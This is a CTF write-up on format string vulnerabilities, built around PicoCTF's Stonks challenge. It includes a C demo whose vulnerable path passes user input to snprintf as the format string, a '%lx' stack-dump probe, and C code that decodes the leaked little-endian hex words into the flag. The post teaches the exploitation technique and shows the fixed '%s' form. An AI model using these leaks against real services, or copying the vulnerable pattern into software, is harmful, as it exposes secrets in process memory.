Format String Vulnerabilities - STONKS (PicoCTF WriteUp)

A format string vulnerability occurs when user-supplied input is handed to a formatting function as the format string itself, so the application interprets whatever format specifiers the attacker put into the input. Depending on the specifiers, the attacker can read the stack, read or write arbitrary locations in process memory (a write primitive that can be built up to code execution), or crash the application with a segmentation fault, compromising the security or the stability of the system. The bug appears whenever user-supplied data is used directly as the format argument of C/C++ functions such as printf, fprintf, sprintf, setproctitle or syslog. How much this costs an organisation depends on the skill of the attacker. So let's go through a real-life scenario of this vulnerability. For the demonstration I'm using PicoCTF's Stonks challenge, which fits perfectly.

STONKS

Description

I decided to try something no one else has before. I made a bot to automatically trade stonks for me using AI and machine learning. I wouldn't believe you if you told me it's insecure! vuln.c nc mercury.picoctf.net 20195

In this challenge we first get a file, vuln.c, and a netcat command to connect to the challenge. Let's connect with netcat first and see what we get.

OK, here we can see it's a trading app where we can buy stonks. Let's go through the vuln.c we got from the challenge.

In the last part of the code we can see that the program asks for the API token and reads the answer with scanf and the "%300s" format. That caps the input at 300 characters but says nothing about its content. Then, when it prints "Buying stonks with token", it passes user_buf straight to printf as the format string instead of printing it through a fixed "%s" format. That is the format string bug: any format parameters we type in are interpreted by printf, and every one that expects an argument pulls the next argument slot off the stack (on this 32-bit binary, the next 4-byte word). Below are some format parameters that can be used and their consequences:

• "%x" reads the next word from the stack and prints it as hex

• "%s" treats the next word as a pointer and prints the character string at that address in the process's memory

• "%n" writes the number of characters printed so far to the address held in the next word, an integer write into the process's memory
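To make the bug concrete, here is an added example (my own code, not the challenge's vuln.c) with the two ways the token could be echoed side by side: the vulnerable path passes user_buf to the formatting function as the format, the hardened path prints it through a fixed "%s". The buffer name api_buf and the token value are constructed stand-ins for what vuln.c reads from its "api" file; snprintf is used in place of printf only so the output can be compared, and the compiler's format warning is silenced on purpose so the bug compiles.

```c
#include <stdio.h>
#include <string.h>

/* Silence the warning gcc/clang raise for a non-literal format with no
 * arguments; it fires on exactly the line that is the bug. */
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"

#define FLAG_BUFFER 128

/* Echo the user's token into `out`. With hardened == 0 this reproduces the
 * vuln.c bug: user_buf itself is the format string, so any % specifiers in
 * it are interpreted and pull "arguments" from registers and the stack.
 * With hardened == 1 the format is the fixed literal "%s" and user_buf is
 * nothing more than data. Returns what snprintf returns. */
int echo_token(const char *user_buf, int hardened, char *out, size_t outlen)
{
    /* Stack buffer standing in for api_buf, which vuln.c fills from the
     * "api" file before it asks for the token. Constructed value. */
    char api_buf[FLAG_BUFFER] = "picoCTF{constructed_demo_token}";
    /* A volatile pointer to the buffer stops the compiler from optimising
     * the otherwise unused array out of the frame, so it really is on the
     * stack where a long enough run of %x would reach it. */
    char *volatile keep = api_buf;
    (void)keep;

    if (hardened)
        return snprintf(out, outlen, "%s", user_buf); /* fixed format: safe */
    return snprintf(out, outlen, user_buf);           /* BUG: user data as format */
}

/* Convenience wrappers that return the echoed text for one input. */
static char g_out[512];

const char *echo_vulnerable(const char *user_buf)
{
    echo_token(user_buf, 0, g_out, sizeof g_out);
    return g_out;
}

const char *echo_hardened(const char *user_buf)
{
    echo_token(user_buf, 1, g_out, sizeof g_out);
    return g_out;
}

int main(void)
{
    /* "%%" needs no argument, so it shows format interpretation without
     * touching the stack: vulnerable prints "100%", hardened prints the
     * input unchanged. */
    printf("vulnerable: %s\n", echo_vulnerable("100%%"));
    printf("hardened:   %s\n", echo_hardened("100%%"));

    /* The challenge probe: each %lx consumes an argument slot that was
     * never supplied, so the words come from registers and the stack. The
     * values depend on compiler, ABI and build, so they are only printed. */
    printf("stack dump: %s\n",
           echo_vulnerable("%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx"));
    return 0;
}
```

The hardened form is the whole fix: a "%s" format never interprets the data it prints. The "%300s" on the scanf side only limits length and is no defence against this, since 300 characters is room for about a hundred "%x." specifiers.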



So let's try with "%x" first. When I tried with two format specifiers I got some data back from the stack, so now we are sure we can read the token through this vulnerability. To reach it we need to use as many of these specifiers as the 300-character limit allows.

Gotcha! We found the token. But it's in hex, so we need to convert it to ASCII to read the flag. You can use whatever method you like; here I'm simply using an online converter.

Here we can see something in the flag format, but it isn't quite right. Can you guess why? Yes, the characters are scrambled: the stack was dumped as 4-byte words, and on this little-endian x86 target each word prints its bytes in reverse order, so every group of four characters comes out backwards. There are many ways to undo this; I'll mention a few.

1) Take the flag as it is now and convert it back to hex. Swap each 4-byte word from little-endian to big-endian byte order, then convert it to ASCII again and you will get the flag.

2) Do it by hand. Copy the flag in its current form and rewrite each group of four characters in reverse order. You will get the flag.

3) Lastly, my favourite: use Python to do the byte swap. A few lines of code are enough, and here we can see we got the flag.
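The same last step written out in C, as an added example that is not the post's own script: it takes the hex words a "%x" probe prints, undoes the little-endian byte order of each word, and looks for the flag in the result. It assumes the specifiers were separated so the words can be told apart, and that the words are 4 bytes wide (which the 4-character groups in the dump indicate); the word width is a parameter so a "%lx" dump from a 64-bit target works too. The sample dump and its flag are constructed for the demo, not the real challenge output.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Turn a dump of hex words into the bytes they held, least significant byte
 * first (little-endian). "%x" prints no leading zeros, so a word that held
 * "\n\0\0\0" appears as "a", not "0000000a": every token is parsed as a
 * number and always expanded to word_bytes bytes. Any character that is not
 * a hex digit is treated as a separator. Returns the number of bytes written. */
size_t words_to_bytes(const char *dump, int word_bytes, uint8_t *out, size_t outlen)
{
    size_t n = 0;
    const char *p = dump;
    while (*p != '\0' && n + (size_t)word_bytes <= outlen) {
        if (!isxdigit((unsigned char)*p)) { /* separator such as '-' or '.' */
            p++;
            continue;
        }
        char *end;
        unsigned long long w = strtoull(p, &end, 16);
        for (int i = 0; i < word_bytes; i++)
            out[n++] = (uint8_t)(w >> (8 * i));
        p = end;
    }
    return n;
}

/* Find picoCTF{...} in a byte buffer that may contain NULs (strstr would
 * stop at the first one). Returns a malloc'd copy of the flag or NULL. */
char *extract_flag(const uint8_t *buf, size_t len)
{
    static const char prefix[] = "picoCTF{";
    size_t plen = sizeof prefix - 1;
    for (size_t i = 0; i + plen <= len; i++) {
        if (memcmp(buf + i, prefix, plen) != 0)
            continue;
        /* Scan forward for the closing brace; a NUL means the string ended
         * without one, so this was not a complete flag. */
        for (size_t j = i + plen; j < len && buf[j] != '\0'; j++) {
            if (buf[j] == '}') {
                size_t flen = j - i + 1;
                char *flag = malloc(flen + 1);
                if (!flag)
                    return NULL;
                memcpy(flag, buf + i, flen);
                flag[flen] = '\0';
                return flag;
            }
        }
    }
    return NULL;
}

/* One-shot helper: hex dump in, flag out (caller frees), NULL if absent. */
char *recover_flag(const char *dump, int word_bytes)
{
    uint8_t bytes[4096];
    size_t n = words_to_bytes(dump, word_bytes, bytes, sizeof bytes);
    return extract_flag(bytes, n);
}

/* Constructed sample: what a "%x-%x-..." probe would print if api_buf held
 * "picoCTF{demo_flag_0}\n" (fgets keeps the newline) on a 32-bit stack,
 * with a few unrelated words around it. Not the real challenge output. */
const char *SAMPLE_DUMP =
    "80f9c2d0-3-f7fa1000-6f636970-7b465443-6f6d6564-616c665f-7d305f67-a-5655a2c0";

int main(void)
{
    char *flag = recover_flag(SAMPLE_DUMP, 4);
    printf("%s\n", flag ? flag : "no flag found");
    free(flag);
    return 0;
}
```

Because "%x" drops leading zeros, the words cannot be split apart if the probe is sent as "%x%x%x" with nothing between the specifiers; put a separator after each one (scanf's "%300s" stops at whitespace, so use "." or "-" rather than a space) or use "%08x" for a fixed width. Passing 8 as word_bytes decodes a dump taken with "%lx" on a 64-bit target.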
